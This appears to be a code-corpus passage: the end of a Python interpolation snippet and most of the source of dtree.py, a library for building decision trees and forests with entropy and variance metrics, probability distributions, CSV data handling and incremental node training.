hi = (lo + hi)/2 if idx == 0 else hi
return (lo, hi, pt)
else:
m = 2**(level-1) + 1 # Number of nodes at this level
x = lo + (hi-lo)*self.nodes[level-1][idx]
return (x-(hi-lo)/(m-1), x+(hi-lo)/(m-1), pt)
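# Small self-check (illustrative): three interpolation levels over the interval
# [0, 10]; node (1, 0) is the midpoint and its level-1 basis function is constant.
if __name__ == '__main__':
    RandomDimension.set_maximum_interp_level(3)
    rd = RandomDimension((0.0, 10.0))
    assert rd.get_node(1, 0) == 5.0
    assert rd.interpolate((1, 0), 3.0) == 1.0
    assert abs(rd.interpolate((2, 0), 2.5) - 0.5) < 1e-12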
| gpl-3.0 | -7,993,344,271,732,080,000 | 31.973451 | 80 | 0.580247 | false |
chrisspen/dtree | dtree.py | 1 | 68634 | """
2012.1.24 CKS
Algorithms for building and using a decision tree for classification or regression.
"""
from __future__ import print_function
from collections import defaultdict
from decimal import Decimal
from pprint import pprint
import copy
import csv
import math
from math import pi
import os
import random
import re
import unittest
import pickle
VERSION = (2, 0, 0)
__version__ = '.'.join(map(str, VERSION))
# Traditional entropy.
ENTROPY1 = 'entropy1'
# Modified entropy that penalizes universally unique values.
ENTROPY2 = 'entropy2'
# Modified entropy that penalizes universally unique values
# as well as features with large numbers of values.
ENTROPY3 = 'entropy3'
DISCRETE_METRICS = [
ENTROPY1,
ENTROPY2,
ENTROPY3,
]
# Simple statistical variance, the measure of how far a set of numbers
# is spread out.
VARIANCE1 = 'variance1'
# Like ENTROPY2, is the variance weighted to penalize attributes with
# universally unique values.
VARIANCE2 = 'variance2'
CONTINUOUS_METRICS = [
VARIANCE1,
VARIANCE2,
]
DEFAULT_DISCRETE_METRIC = ENTROPY1
DEFAULT_CONTINUOUS_METRIC = VARIANCE1
# Methods for aggregating the predictions of trees in a forest.
EQUAL_MEAN = 'equal-mean'
WEIGHTED_MEAN = 'weighted-mean'
BEST = 'best'
AGGREGATION_METHODS = [
EQUAL_MEAN,
WEIGHTED_MEAN,
BEST,
]
# Forest growth algorithms.
GROW_RANDOM = 'random'
GROW_AUTO_MINI_BATCH = 'auto-mini-batch'
GROW_AUTO_INCREMENTAL = 'auto-incremental'
GROW_METHODS = [
GROW_RANDOM,
GROW_AUTO_MINI_BATCH,
GROW_AUTO_INCREMENTAL,
]
# Data format names.
ATTR_TYPE_NOMINAL = NOM = 'nominal'
ATTR_TYPE_DISCRETE = DIS = 'discrete'
ATTR_TYPE_CONTINUOUS = CON = 'continuous'
ATTR_MODE_CLASS = CLS = 'class'
ATTR_HEADER_PATTERN = re.compile("([^,:]+):(nominal|discrete|continuous)(?::(class))?")
def get_mean(seq):
"""
Batch mean calculation.
"""
return sum(seq)/float(len(seq))
def get_variance(seq):
"""
Batch variance calculation.
"""
m = get_mean(seq)
return sum((v-m)**2 for v in seq)/float(len(seq))
def standard_deviation(seq):
return math.sqrt(get_variance(seq))
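# Worked example of the batch helpers above (values checked by hand):
# get_mean([1, 2, 3, 4]) == 2.5, get_variance([1, 2, 3, 4]) == 1.25 (population
# variance), and standard_deviation([1, 2, 3, 4]) == sqrt(1.25) ~= 1.118.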
def mean_absolute_error(seq, correct):
"""
Batch mean absolute error calculation.
"""
assert len(seq) == len(correct)
diffs = [abs(a-b) for a, b in zip(seq, correct)]
return sum(diffs)/float(len(diffs))
def normalize(seq):
"""
Scales each number in the sequence so that the sum of all numbers equals 1.
"""
s = float(sum(seq))
return [v/s for v in seq]
def erfcc(x):
"""
Complementary error function.
"""
z = abs(x)
t = 1. / (1. + 0.5*z)
r = t * math.exp(-z*z-1.26551223+t*(1.00002368+t*(.37409196+
t*(.09678418+t*(-.18628806+t*(.27886807+
t*(-1.13520398+t*(1.48851587+t*(-.82215223+
t*.17087277)))))))))
if (x >= 0.):
return r
else:
return 2. - r
def normcdf(x, mu, sigma):
"""
    Returns the probability that a normally distributed random variable (with mean
    mu and standard deviation sigma) takes a value less than or equal to x.
http://en.wikipedia.org/wiki/Cumulative_distribution_function
"""
t = x-mu
y = 0.5*erfcc(-t/(sigma*math.sqrt(2.0)))
if y > 1.0:
y = 1.0
return y
def normpdf(x, mu, sigma):
"""
Describes the relative likelihood that a real-valued random variable X will
take on a given value.
http://en.wikipedia.org/wiki/Probability_density_function
"""
u = (x-mu)/abs(sigma)
y = (1/(math.sqrt(2*pi)*abs(sigma)))*math.exp(-u*u/2)
return y
def normdist(x, mu, sigma, f=True):
if f:
y = normcdf(x, mu, sigma)
else:
y = normpdf(x, mu, sigma)
return y
def normrange(x1, x2, mu, sigma, f=True):
p1 = normdist(x1, mu, sigma, f)
p2 = normdist(x2, mu, sigma, f)
return abs(p1-p2)
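# Worked example: for the standard normal distribution (mu=0, sigma=1),
# normdist(0, 0, 1) returns 0.5 (to within the error of the erfcc approximation)
# and normrange(-1.96, 1.96, 0, 1) is roughly 0.95, the familiar 95% interval.
# With f=False both calls return densities from normpdf instead of CDF values.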
def cmp(a, b): # pylint: disable=redefined-builtin
return (a > b) - (a < b)
class DDist:
"""
Incrementally tracks the probability distribution of discrete elements.
"""
def __init__(self, seq=None):
self.clear()
if seq:
for k in seq:
self.counts[k] += 1
self.total += 1
def __cmp__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return cmp(
(frozenset(self.counts.items()), self.total),
(frozenset(other.counts.items()), other.total)
)
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return (frozenset(self.counts.items()), self.total) == \
(frozenset(other.counts.items()), other.total)
def __getitem__(self, k):
"""
Returns the probability for the given element.
"""
cnt = 0
if k in self.counts:
cnt = self.counts[k]
return cnt/float(self.total)
def __hash__(self):
return hash((frozenset(self.counts.items()), self.total))
def __repr__(self):
s = []
for k, prob in self.probs:
s.append("%s=%s" % (k, prob))
return "<%s %s>" % (type(self).__name__, ', '.join(s))
def add(self, k, count=1):
"""
Increments the count for the given element.
"""
self.counts[k] += count
self.total += count
@property
def best(self):
"""
Returns the element with the highest probability.
"""
b = (-1e999999, None)
for k, c in self.counts.items():
b = max(b, (c, k))
return b[1]
@property
def best_prob(self):
probs = self.probs
if not probs:
return
best = -1e999999
for _, prob in probs:
best = max(best, prob)
return best
def clear(self):
self.counts = defaultdict(int)
self.total = 0
def copy(self):
return copy.deepcopy(self)
@property
def count(self):
"""
The total number of samples forming this distribution.
"""
return self.total
def keys(self):
return self.counts.keys()
@property
def probs(self):
"""
Returns a list of probabilities for all elements in the form
[(value1,prob1),(value2,prob2),...].
"""
return [
(k, self.counts[k]/float(self.total))
for k in self.counts.keys()
]
def update(self, dist):
"""
Adds the given distribution's counts to the current distribution.
"""
assert isinstance(dist, DDist)
for k, c in dist.counts.items():
self.counts[k] += c
self.total += dist.total
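# Example of incremental use (values checked by hand): DDist(['a', 'a', 'b']) gives
# counts {'a': 2, 'b': 1}, so dist['a'] == 2/3, dist.best == 'a' and
# dist.best_prob == 2/3; calling dist.add('b') afterwards rebalances both
# probabilities to 0.5.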
class CDist:
"""
Incrementally tracks the probability distribution of continuous numbers.
"""
def __init__(self, seq=None, mean=None, var=None, stdev=None):
self.clear()
if mean is not None:
self.mean_sum = mean
self.mean_count = 1
if var is not None:
self.last_variance = var
self.mean_count = 1
if stdev is not None:
self.last_variance = stdev**2
self.mean_count = 1
if seq:
for n in seq:
self += n
def clear(self):
self.mean_sum = 0
self.mean_count = 0
self.last_variance = 0
def copy(self):
return copy.deepcopy(self)
def __repr__(self):
return "<%s mean=%s variance=%s>" % (type(self).__name__, self.mean, self.variance)
def __iadd__(self, value):
last_mean = self.mean
self.mean_sum += value
self.mean_count += 1
if last_mean is not None:
self.last_variance = self.last_variance \
+ (value - last_mean)*(value - self.mean)
return self
@property
def count(self):
"""
The total number of samples forming this distribution.
"""
return self.mean_count
@property
def mean(self):
if self.mean_count:
return self.mean_sum/float(self.mean_count)
@property
def variance(self):
if self.mean_count:
return self.last_variance/float(self.mean_count)
@property
def standard_deviation(self):
var = self.variance
if var is None:
return
return math.sqrt(var)
def probability_lt(self, x):
"""
Returns the probability of a random variable being less than the
given value.
"""
if self.mean is None:
return
return normdist(x=x, mu=self.mean, sigma=self.standard_deviation)
def probability_in(self, a, b):
"""
Returns the probability of a random variable falling between the given
values.
"""
if self.mean is None:
return
p1 = normdist(x=a, mu=self.mean, sigma=self.standard_deviation)
p2 = normdist(x=b, mu=self.mean, sigma=self.standard_deviation)
return abs(p1 - p2)
def probability_gt(self, x):
"""
Returns the probability of a random variable being greater than the
given value.
"""
if self.mean is None:
return
p = normdist(x=x, mu=self.mean, sigma=self.standard_deviation)
return 1-p
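# Example of incremental use: CDist(seq=[1.0, 2.0, 3.0]) accumulates a running
# mean and variance, giving mean == 2.0 and variance == 2/3 (population variance),
# so standard_deviation ~= 0.816; probability_lt(2.0) is then ~0.5 because the
# query point sits at the mean of the fitted normal.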
def entropy(data, class_attr=None, method=DEFAULT_DISCRETE_METRIC):
"""
    Calculates the entropy of the attribute attr in the given data set data.
Parameters:
data<dict|list> :=
if dict, treated as value counts of the given attribute name
if list, treated as a raw list from which the value counts will be generated
attr<string> := the name of the class attribute
"""
assert (class_attr is None and isinstance(data, dict)) or (class_attr is not None and isinstance(data, list))
if isinstance(data, dict):
counts = data
else:
counts = defaultdict(float) # {attr:count}
for record in data:
# Note: A missing attribute is treated like an attribute with a value
            # of None, indicating that the attribute is "irrelevant".
counts[record.get(class_attr)] += 1.0
len_data = float(sum(cnt for _, cnt in counts.items()))
n = max(2, len(counts))
total = float(sum(counts.values()))
assert total, "There must be at least one non-zero count."
if method == ENTROPY1:
return -sum((count/len_data)*math.log(count/len_data, n)
for count in counts.values() if count)
elif method == ENTROPY2:
return -sum((count/len_data)*math.log(count/len_data, n)
for count in counts.values() if count) - ((len(counts)-1)/float(total))
elif method == ENTROPY3:
return -sum((count/len_data)*math.log(count/len_data, n)
for count in counts.values() if count) - 100*((len(counts)-1)/float(total))
else:
raise Exception("Unknown entropy method %s." % method)
def entropy_variance(data, class_attr=None,
method=DEFAULT_CONTINUOUS_METRIC):
"""
    Calculates the variance of a continuous class attribute, to be used as an
entropy metric.
"""
assert method in CONTINUOUS_METRICS, "Unknown entropy variance metric: %s" % (method,)
assert (class_attr is None and isinstance(data, dict)) or (class_attr is not None and isinstance(data, list))
if isinstance(data, dict):
lst = data
else:
lst = [record.get(class_attr) for record in data]
return get_variance(lst)
def get_gain(data, attr, class_attr,
method=DEFAULT_DISCRETE_METRIC,
only_sub=0, prefer_fewer_values=False, entropy_func=None):
"""
Calculates the information gain (reduction in entropy) that would
    result from splitting the data on the chosen attribute (attr).
Parameters:
prefer_fewer_values := Weights the gain by the count of the attribute's
        unique values. If multiple attributes have the same gain, but one has
        slightly fewer unique values, this will cause the one with fewer
        values to be preferred.
"""
entropy_func = entropy_func or entropy
val_freq = defaultdict(float)
subset_entropy = 0.0
# Calculate the frequency of each of the values in the target attribute
for record in data:
val_freq[record.get(attr)] += 1.0
# Calculate the sum of the entropy for each subset of records weighted
    # by their probability of occurring in the training set.
for val in val_freq.keys():
val_prob = val_freq[val] / sum(val_freq.values())
data_subset = [record for record in data if record.get(attr) == val]
e = entropy_func(data_subset, class_attr, method=method)
subset_entropy += val_prob * e
if only_sub:
return subset_entropy
# Subtract the entropy of the chosen attribute from the entropy of the
# whole data set with respect to the target attribute (and return it)
main_entropy = entropy_func(data, class_attr, method=method)
# Prefer gains on attributes with fewer values.
if prefer_fewer_values:
return ((main_entropy - subset_entropy), 1./len(val_freq))
else:
return (main_entropy - subset_entropy)
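# Worked example (toy data, checked by hand): with
#   data = [{'outlook': 'sunny', 'play': 'no'},  {'outlook': 'sunny', 'play': 'yes'},
#           {'outlook': 'rain',  'play': 'yes'}, {'outlook': 'rain',  'play': 'yes'}]
# get_gain(data, 'outlook', 'play') is entropy(play) minus the weighted subset
# entropy, ~0.811 - 0.5 = ~0.311, i.e. splitting on 'outlook' removes part of the
# class uncertainty.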
def gain_variance(*args, **kwargs):
"""
Calculates information gain using variance as the comparison metric.
"""
return get_gain(entropy_func=entropy_variance, *args, **kwargs)
def majority_value(data, class_attr):
"""
Creates a list of all values in the target attribute for each record
in the data list object, and returns the value that appears in this list
    most frequently.
"""
if is_continuous(data[0][class_attr]):
return CDist(seq=[record[class_attr] for record in data])
else:
return most_frequent([record[class_attr] for record in data])
def most_frequent(lst):
"""
Returns the item that appears most frequently in the given list.
"""
lst = lst[:]
highest_freq = 0
most_freq = None
for val in unique(lst):
if lst.count(val) > highest_freq:
most_freq = val
highest_freq = lst.count(val)
return most_freq
def unique(lst):
"""
Returns a list made up of the unique values found in lst. i.e., it
removes the redundant values in lst.
"""
lst = lst[:]
unique_lst = []
# Cycle through the list and add each value to the unique list only once.
for item in lst:
if unique_lst.count(item) <= 0:
unique_lst.append(item)
# Return the list with all redundant values removed.
return unique_lst
def get_values(data, attr):
"""
    Creates a list of values in the chosen attribute for each record in data,
    prunes out all of the redundant values, and returns the list.
"""
return unique([record[attr] for record in data])
def choose_attribute(data, attributes, class_attr, fitness, method):
"""
Cycles through all the attributes and returns the attribute with the
highest information gain (or lowest entropy).
"""
best = (-1e999999, None)
for attr in attributes:
if attr == class_attr:
continue
gain = fitness(data, attr, class_attr, method=method)
best = max(best, (gain, attr))
return best[1]
def is_continuous(v):
return isinstance(v, (float, Decimal))
def create_decision_tree(data, attributes, class_attr, fitness_func, wrapper, **kwargs):
"""
Returns a new decision tree based on the examples given.
"""
split_attr = kwargs.get('split_attr', None)
split_val = kwargs.get('split_val', None)
assert class_attr not in attributes
node = None
data = list(data) if isinstance(data, Data) else data
if wrapper.is_continuous_class:
stop_value = CDist(seq=[r[class_attr] for r in data])
# For a continuous class case, stop if all the remaining records have
# a variance below the given threshold.
stop = wrapper.leaf_threshold is not None \
and stop_value.variance <= wrapper.leaf_threshold
else:
stop_value = DDist(seq=[r[class_attr] for r in data])
# For a discrete class, stop if all remaining records have the same
# classification.
stop = len(stop_value.counts) <= 1
if not data or len(attributes) <= 0:
# If the dataset is empty or the attributes list is empty, return the
# default value. The target attribute is not in the attributes list, so
# we need not subtract 1 to account for the target attribute.
if wrapper:
wrapper.leaf_count += 1
return stop_value
elif stop:
# If all the records in the dataset have the same classification,
# return that classification.
if wrapper:
wrapper.leaf_count += 1
return stop_value
else:
# Choose the next best attribute to best classify our data
best = choose_attribute(
data,
attributes,
class_attr,
fitness_func,
method=wrapper.metric)
# Create a new decision tree/node with the best attribute and an empty
# dictionary object--we'll fill that up next.
node = Node(tree=wrapper, attr_name=best)
node.n += len(data)
# Create a new decision tree/sub-node for each of the values in the
# best attribute field
for val in get_values(data, best):
# Create a subtree for the current value under the "best" field
subtree = create_decision_tree(
[r for r in data if r[best] == val],
[attr for attr in attributes if attr != best],
class_attr,
fitness_func,
split_attr=best,
split_val=val,
wrapper=wrapper)
# Add the new subtree to the empty dictionary object in our new
# tree/node we just created.
if isinstance(subtree, Node):
node._branches[val] = subtree
elif isinstance(subtree, (CDist, DDist)):
node.set_leaf_dist(attr_value=val, dist=subtree)
else:
raise Exception("Unknown subtree type: %s" % (type(subtree),))
return node
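# Note: create_decision_tree is normally driven through Tree.build (defined
# below), which passes itself as `wrapper` and picks the fitness function
# based on whether the class attribute is continuous or discrete, e.g. (file
# name hypothetical):
#
#   t = Tree.build(Data('training.csv'))
#
# Calling create_decision_tree directly requires supplying a Tree instance as
# the wrapper so the metric and leaf counts can be tracked.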
class Data:
"""
Parses, validates and iterates over tabular data in a file
    or a generic iterator.
This does not store the actual data rows. It only stores the row schema.
"""
def __init__(self, inp, order=None, types=None, modes=None):
self.header_types = types or {} # {attr_name:type}
self.header_modes = modes or {} # {attr_name:mode}
if isinstance(order, str):
order = order.split(',')
self.header_order = order or [] # [attr_name,...]
# Validate header type.
if isinstance(self.header_types, (tuple, list)):
assert self.header_order, 'If header type names were not given, an explicit order must be specified.'
assert len(self.header_types) == len(self.header_order), 'Header order length must match header type length.'
self.header_types = dict(zip(self.header_order, self.header_types))
self.filename = None
self.data = None
if isinstance(inp, str):
filename = inp
assert os.path.isfile(filename), "File \"%s\" does not exist." % filename
self.filename = filename
else:
assert self.header_types, "No attribute types specified."
assert self.header_modes, "No attribute modes specified."
self.data = inp
self._class_attr_name = None
if self.header_modes:
for k, v in self.header_modes.items():
if v != CLS:
continue
self._class_attr_name = k
break
assert self._class_attr_name, "No class attribute specified."
def copy_no_data(self):
"""
Returns a copy of the object without any data.
"""
return type(self)(
[],
order=list(self.header_modes),
types=self.header_types.copy(),
modes=self.header_modes.copy())
def __len__(self):
if self.filename:
return max(0, open(self.filename).read().strip().count('\n'))
elif hasattr(self.data, '__len__'):
return len(self.data)
def __bool__(self):
return bool(len(self))
__nonzero__ = __bool__
@property
def class_attribute_name(self):
return self._class_attr_name
@property
def attribute_names(self):
self._read_header()
return [
n for n in self.header_types.keys()
if n != self._class_attr_name
]
def get_attribute_type(self, name):
if not self.header_types:
self._read_header()
return self.header_types[name]
@property
def is_continuous_class(self):
self._read_header()
return self.get_attribute_type(self._class_attr_name) == ATTR_TYPE_CONTINUOUS
def is_valid(self, name, value):
"""
Returns true if the given value matches the type for the given name
according to the schema.
Returns false otherwise.
"""
if name not in self.header_types:
return False
t = self.header_types[name]
if t == ATTR_TYPE_DISCRETE:
return isinstance(value, int)
elif t == ATTR_TYPE_CONTINUOUS:
return isinstance(value, (float, Decimal))
return True
def _read_header(self):
"""
        When a CSV file is given, extracts header information from the file.
Otherwise, this header data must be explicitly given when the object
is instantiated.
"""
if not self.filename or self.header_types:
return
rows = csv.reader(open(self.filename))
header = next(rows)
self.header_types = {} # {attr_name:type}
self._class_attr_name = None
self.header_order = [] # [attr_name,...]
for el in header:
matches = ATTR_HEADER_PATTERN.findall(el)
assert matches, "Invalid header element: %s" % (el,)
el_name, el_type, el_mode = matches[0]
el_name = el_name.strip()
self.header_order.append(el_name)
self.header_types[el_name] = el_type
if el_mode == ATTR_MODE_CLASS:
assert self._class_attr_name is None, "Multiple class attributes are not supported."
self._class_attr_name = el_name
else:
assert self.header_types[el_name] != ATTR_TYPE_CONTINUOUS, "Non-class continuous attributes are not supported."
assert self._class_attr_name, "A class attribute must be specified."
def validate_row(self, row):
"""
Ensure each element in the row matches the schema.
"""
clean_row = {}
if isinstance(row, (tuple, list)):
assert self.header_order, "No attribute order specified."
assert len(row) == len(self.header_order), "Row length does not match header length."
itr = zip(self.header_order, row)
else:
assert isinstance(row, dict)
itr = row.items()
for el_name, el_value in itr:
if self.header_types[el_name] == ATTR_TYPE_DISCRETE:
clean_row[el_name] = int(el_value)
elif self.header_types[el_name] == ATTR_TYPE_CONTINUOUS:
clean_row[el_name] = float(el_value)
else:
clean_row[el_name] = el_value
return clean_row
def _get_iterator(self):
if self.filename:
self._read_header()
itr = csv.reader(open(self.filename))
next(itr) # Skip header.
return itr
return self.data
def __iter__(self):
for row in self._get_iterator():
if not row:
continue
yield self.validate_row(row)
def split(self, ratio=0.5, leave_one_out=False):
"""
Returns two Data instances, containing the data randomly split between
the two according to the given ratio.
The first instance will contain the ratio of data specified.
The second instance will contain the remaining ratio of data.
If leave_one_out is True, the ratio will be ignored and the first
instance will contain exactly one record for each class label, and
the second instance will contain all remaining data.
"""
a_labels = set()
a = self.copy_no_data()
b = self.copy_no_data()
for row in self:
if leave_one_out and not self.is_continuous_class:
label = row[self.class_attribute_name]
if label not in a_labels:
a_labels.add(label)
a.data.append(row)
else:
b.data.append(row)
elif not a:
a.data.append(row)
elif not b:
b.data.append(row)
elif random.random() <= ratio:
a.data.append(row)
else:
b.data.append(row)
return a, b
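# Illustrative sketch of splitting a dataset (file name hypothetical): the
# first instance returned holds roughly the requested ratio of rows.
#
#   data = Data('samples.csv')
#   test, train = data.split(ratio=0.25)   # ~25% of rows end up in `test`
#
# With leave_one_out=True the first instance instead receives exactly one
# record per class label and the second receives everything else.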
USE_NEAREST = 'use_nearest'
MISSING_VALUE_POLICIES = set([
USE_NEAREST,
])
def _get_dd_int():
return defaultdict(int)
def _get_dd_dd_int():
return defaultdict(_get_dd_int)
def _get_dd_cdist():
return defaultdict(CDist)
class NodeNotReadyToPredict(Exception):
pass
class Node:
"""
Represents a specific split or branch in the tree.
"""
def __init__(self, tree, attr_name=None):
# The number of samples this node has been trained on.
self.n = 0
# A reference to the container tree instance.
self._tree = tree
# The splitting attribute at this node.
self.attr_name = attr_name
#### Discrete values.
# Counts of each observed attribute value, used to calculate an
# attribute value's probability.
# {attr_name:{attr_value:count}}
self._attr_value_counts = defaultdict(_get_dd_int)
# {attr_name:total}
self._attr_value_count_totals = defaultdict(int)
# Counts of each observed class value and attribute value in
# combination, used to calculate an attribute value's entropy.
# {attr_name:{attr_value:{class_value:count}}}
self._attr_class_value_counts = defaultdict(_get_dd_dd_int)
#### Continuous values.
# Counts of each observed class value, used to calculate a class
# value's probability.
# {class_value:count}
self._class_ddist = DDist()
# {attr_name:{attr_value:CDist(variance)}}
self._attr_value_cdist = defaultdict(_get_dd_cdist)
self._class_cdist = CDist()
self._branches = {} # {v:Node}
def __getitem__(self, attr_name):
assert attr_name == self.attr_name
branches = self._branches.copy()
for value in self.get_values(attr_name):
if value in branches:
continue
if self.tree.data.is_continuous_class:
branches[value] = self._attr_value_cdist[self.attr_name][value].copy()
else:
branches[value] = self.get_value_ddist(self.attr_name, value)
return branches
def _get_attribute_value_for_node(self, record):
"""
Gets the closest value for the current node's attribute matching the
given record.
"""
        # Abort if this node has not yet been split on an attribute.
if self.attr_name is None:
return
# Otherwise, lookup the attribute value for this node in the given record.
attr = self.attr_name
attr_value = record[attr]
attr_values = self.get_values(attr)
if attr_value in attr_values:
return attr_value
else:
# The value of the attribute in the given record does not directly
# map to any previously known values, so apply a missing value
# policy.
policy = self.tree.missing_value_policy.get(attr)
assert policy, "No missing value policy specified for attribute %s." % (attr,)
if policy == USE_NEAREST:
                # Use the value that the tree has seen that also has the
                # smallest Euclidean distance to the actual value.
assert self.tree.data.header_types[attr] in (ATTR_TYPE_DISCRETE, ATTR_TYPE_CONTINUOUS), "The use-nearest policy is invalid for nominal types."
nearest = (1e999999, None)
for _value in attr_values:
nearest = min(nearest, (abs(_value - attr_value), _value))
_, nearest_value = nearest
return nearest_value
else:
raise Exception("Unknown missing value policy: %s" % (policy,))
@property
def attributes(self):
return self._attr_value_counts.keys()
def get_values(self, attr_name):
"""
Retrieves the unique set of values seen for the given attribute
at this node.
"""
ret = list(self._attr_value_cdist[attr_name].keys()) \
+ list(self._attr_value_counts[attr_name].keys()) \
+ list(self._branches.keys())
ret = set(ret)
return ret
@property
def is_continuous_class(self):
return self._tree.is_continuous_class
def get_best_splitting_attr(self):
"""
Returns the name of the attribute with the highest gain.
"""
best = (-1e999999, None)
for attr in self.attributes:
best = max(best, (self.get_gain(attr), attr))
best_gain, best_attr = best
return best_attr
def get_entropy(self, attr_name=None, attr_value=None):
"""
Calculates the entropy of a specific attribute/value combination.
"""
is_con = self.tree.data.is_continuous_class
if is_con:
if attr_name is None:
# Calculate variance of class attribute.
var = self._class_cdist.variance
else:
# Calculate variance of the given attribute.
var = self._attr_value_cdist[attr_name][attr_value].variance
if self.tree.metric == VARIANCE1 or attr_name is None:
return var
elif self.tree.metric == VARIANCE2:
unique_value_count = len(self._attr_value_counts[attr_name])
attr_total = float(self._attr_value_count_totals[attr_name])
return var*(unique_value_count/attr_total)
else:
if attr_name is None:
                # The total number of class observations seen at this node.
                total = float(self._class_ddist.total)
                # The number of times each class value has been seen at this
                # node.
                counts = self._class_ddist.counts
                # The number of unique class values seen at this node.
                unique_value_count = len(self._class_ddist.counts)
                # For the class attribute, the attribute total is simply the
                # overall observation total.
                attr_total = total
else:
total = float(self._attr_value_counts[attr_name][attr_value])
counts = self._attr_class_value_counts[attr_name][attr_value]
unique_value_count = len(self._attr_value_counts[attr_name])
attr_total = float(self._attr_value_count_totals[attr_name])
assert total, "There must be at least one non-zero count."
n = max(2, len(counts))
if self._tree.metric == ENTROPY1:
# Traditional entropy.
return -sum(
(count/total)*math.log(count/total, n)
for count in counts.values()
)
elif self._tree.metric == ENTROPY2:
# Modified entropy that down-weights universally unique values.
# e.g. If the number of unique attribute values equals the total
# count of the attribute, then it has the maximum amount of unique
# values.
return -sum(
(count/total)*math.log(count/total, n)
for count in counts.values()
) + (unique_value_count/attr_total)
elif self._tree.metric == ENTROPY3:
# Modified entropy that down-weights universally unique values
# as well as features with large numbers of values.
return -sum(
(count/total)*math.log(count/total, n)
for count in counts.values()
) + 100*(unique_value_count/attr_total)
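    # Worked example for the discrete branch above (hypothetical counts): with
    # class counts {a: 3, b: 1}, total = 4 and n = 2, ENTROPY1 gives
    #   -(3/4 * log2(3/4) + 1/4 * log2(1/4)) ~= 0.811
    # ENTROPY2 and ENTROPY3 add a (unique_value_count / attr_total) term,
    # which raises the entropy -- and therefore lowers the gain -- of
    # attributes whose values are nearly all unique.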
def get_gain(self, attr_name):
"""
Calculates the information gain from splitting on the given attribute.
"""
subset_entropy = 0.0
for value in self._attr_value_counts[attr_name].keys():
value_prob = self.get_value_prob(attr_name, value)
e = self.get_entropy(attr_name, value)
subset_entropy += value_prob * e
return (self.main_entropy - subset_entropy)
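    # Equivalently, gain(A) = H(class) - sum_v P(A=v) * H(class | A=v): the
    # standard information-gain formula, with H being whichever entropy or
    # variance metric the tree was configured to use.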
def get_value_ddist(self, attr_name, attr_value):
"""
Returns the class value probability distribution of the given
attribute value.
"""
assert not self.tree.data.is_continuous_class, "Discrete distributions are only maintained for discrete class types."
ddist = DDist()
cls_counts = self._attr_class_value_counts[attr_name][attr_value]
for cls_value, cls_count in cls_counts.items():
ddist.add(cls_value, count=cls_count)
return ddist
def get_value_prob(self, attr_name, value):
"""
Returns the value probability of the given attribute at this node.
"""
if attr_name not in self._attr_value_count_totals:
return
n = self._attr_value_counts[attr_name][value]
d = self._attr_value_count_totals[attr_name]
return n/float(d)
@property
def main_entropy(self):
"""
Calculates the overall entropy of the class attribute.
"""
return self.get_entropy()
def predict(self, record, depth=0):
"""
Returns the estimated value of the class attribute for the given
record.
"""
# Check if we're ready to predict.
if not self.ready_to_predict:
raise NodeNotReadyToPredict
# Lookup attribute value.
attr_value = self._get_attribute_value_for_node(record)
# Propagate decision to leaf node.
if self.attr_name:
if attr_value in self._branches:
try:
return self._branches[attr_value].predict(record, depth=depth+1)
except NodeNotReadyToPredict:
#TODO:allow re-raise if user doesn't want an intermediate prediction?
pass
# Otherwise make decision at current node.
if self.attr_name:
if self._tree.data.is_continuous_class:
return self._attr_value_cdist[self.attr_name][attr_value].copy()
else:
return self.get_value_ddist(self.attr_name, attr_value)
elif self._tree.data.is_continuous_class:
# Make decision at current node, which may be a true leaf node
# or an incomplete branch in a tree currently being built.
assert self._class_cdist is not None
return self._class_cdist.copy()
else:
return self._class_ddist.copy()
@property
def ready_to_predict(self):
return self.n > 0
@property
def ready_to_split(self):
"""
Returns true if this node is ready to branch off additional nodes.
Returns false otherwise.
"""
# Never split if we're a leaf that predicts adequately.
threshold = self._tree.leaf_threshold
if self._tree.data.is_continuous_class:
var = self._class_cdist.variance
if var is not None and threshold is not None and var <= threshold:
return False
else:
best_prob = self._class_ddist.best_prob
if best_prob is not None and threshold is not None and best_prob >= threshold:
return False
return self._tree.auto_grow \
and not self.attr_name \
and self.n >= self._tree.splitting_n
def set_leaf_dist(self, attr_value, dist):
"""
Sets the probability distribution at a leaf node.
"""
assert self.attr_name
assert self.tree.data.is_valid(self.attr_name, attr_value), "Value %s is invalid for attribute %s." % (attr_value, self.attr_name)
if self.is_continuous_class:
assert isinstance(dist, CDist)
assert self.attr_name
self._attr_value_cdist[self.attr_name][attr_value] = dist.copy()
else:
assert isinstance(dist, DDist)
# {attr_name:{attr_value:count}}
self._attr_value_counts[self.attr_name][attr_value] += 1
# {attr_name:total}
self._attr_value_count_totals[self.attr_name] += 1
# {attr_name:{attr_value:{class_value:count}}}
for cls_value, cls_count in dist.counts.items():
self._attr_class_value_counts[self.attr_name][attr_value][cls_value] += cls_count
def to_dict(self):
if self.attr_name:
# Show a value's branch, whether it's a leaf or another node.
ret = {self.attr_name:{}} # {attr_name:{attr_value:dist or node}}
values = self.get_values(self.attr_name)
for attr_value in values:
if attr_value in self._branches:
ret[self.attr_name][attr_value] = self._branches[attr_value].to_dict()
elif self._tree.data.is_continuous_class:
ret[self.attr_name][attr_value] = self._attr_value_cdist[self.attr_name][attr_value].copy()
else:
ret[self.attr_name][attr_value] = self.get_value_ddist(self.attr_name, attr_value)
return ret
elif self.tree.data.is_continuous_class:
# Otherwise we're at a continuous leaf node.
return self._class_cdist.copy()
else:
# Or a discrete leaf node.
return self._class_ddist.copy()
@property
def tree(self):
return self._tree
def train(self, record):
"""
Incrementally update the statistics at this node.
"""
self.n += 1
class_attr = self.tree.data.class_attribute_name
class_value = record[class_attr]
# Update class statistics.
is_con = self.tree.data.is_continuous_class
if is_con:
# For a continuous class.
self._class_cdist += class_value
else:
# For a discrete class.
self._class_ddist.add(class_value)
# Update attribute statistics.
for an, av in record.items():
if an == class_attr:
continue
self._attr_value_counts[an][av] += 1
self._attr_value_count_totals[an] += 1
if is_con:
self._attr_value_cdist[an][av] += class_value
else:
self._attr_class_value_counts[an][av][class_value] += 1
# Decide if branch should split on an attribute.
if self.ready_to_split:
self.attr_name = self.get_best_splitting_attr()
self.tree.leaf_count -= 1
for av in self._attr_value_counts[self.attr_name]:
self._branches[av] = Node(tree=self.tree)
self.tree.leaf_count += 1
# If we've split, then propagate the update to appropriate sub-branch.
if self.attr_name:
key = record[self.attr_name]
del record[self.attr_name]
self._branches[key].train(record)
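# Summary of the incremental flow implemented by Node.train above (assuming a
# Tree created with auto_grow=True): each call updates the per-attribute
# counts; once the node has seen at least splitting_n samples it selects the
# best splitting attribute, creates a child node for every value observed so
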